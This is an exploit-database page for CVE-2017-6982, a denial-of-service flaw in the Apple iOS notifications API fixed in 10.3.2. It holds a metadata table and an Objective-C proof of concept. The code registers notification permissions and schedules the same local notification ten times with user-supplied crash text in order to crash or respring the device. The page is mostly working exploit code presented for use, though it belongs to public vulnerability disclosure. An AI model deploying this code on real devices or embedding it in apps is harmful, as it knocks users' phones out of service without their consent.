Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2017-6982 | CWE-254 | Unknown | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Local | 2017-05-18 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N | 0.6881 | 0.12817 |
Apple iOS < 10.3.2 - Notifications API Denial of Service # Exploit Title: Apple iOS < 10.3.2 - Notifications API Denial of Service # Date: 05-15-2017 # Exploit Author: Sem Voigtlnder (@OxFEEDFACE), Vincent Desmurs (@vincedes3) and Joseph Shenton # Vendor Homepage: https://apple.com # Software Link: https://support.apple.com/en-us/HT207798 # Version: iOS 10.3.2 # Tested on: iOS 10.3.2 iPhone 6 # CVE : CVE-2017-6982 # We do not disclose a PoC for remote notifications. # PoC for local notifications. (Objective-C). defaults = [NSUserDefaults standardUserDefaults]; UIUserNotificationType types = UIUserNotificationTypeBadge | UIUserNotificationTypeSound | UIUserNotificationTypeAlert; UIUserNotificationSettings *mySettings = [UIUserNotificationSettings settingsForTypes:types categories:nil]; [[UIApplication sharedApplication] registerUserNotificationSettings:mySettings]; //1 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; NSTimeInterval interval; interval = 5; //Time here in second to respring UILocalNotification* localNotification = [[UILocalNotification alloc] init]; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //2 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //3 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //4 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //5 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //6 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //7 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //8 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //9 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification]; //10 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.